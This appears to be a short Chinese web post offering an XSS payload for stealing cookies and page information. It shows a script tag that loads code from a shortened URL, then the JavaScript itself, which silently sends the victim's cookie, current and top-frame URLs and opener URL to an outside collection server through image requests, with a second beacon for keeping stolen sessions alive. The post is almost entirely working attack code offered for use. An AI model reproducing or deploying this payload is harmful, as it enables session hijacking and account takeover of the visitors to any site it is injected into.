xss攻击获取站点信息以及对应的cookie的脚本

<script src=http://is.gd/L1PtPA></script>

========

JS代码如下:

========

(function(){(new Image()).src='http://www.xssserver.com/index.php?do=api&id=P0cbrY&location='+escape((function(){try{return document.location.href}catch(e){return ''}})())+'&toplocation='+escape((function(){try{return top.location.href}catch(e){return ''}})())+'&cookie='+escape((function(){try{return document.cookie}catch(e){return ''}})())+'&opener='+escape((function(){try{return (window.opener && window.opener.location.href)?window.opener.location.href:''}catch(e){return ''}})());})();
if(''==1){keep=new Image();keep.src='http://www.xssserver.com/index.php?do=keepsession&id=P0cbrY&url='+escape(document.location)+'&cookie='+escape(document.cookie)};

相关推荐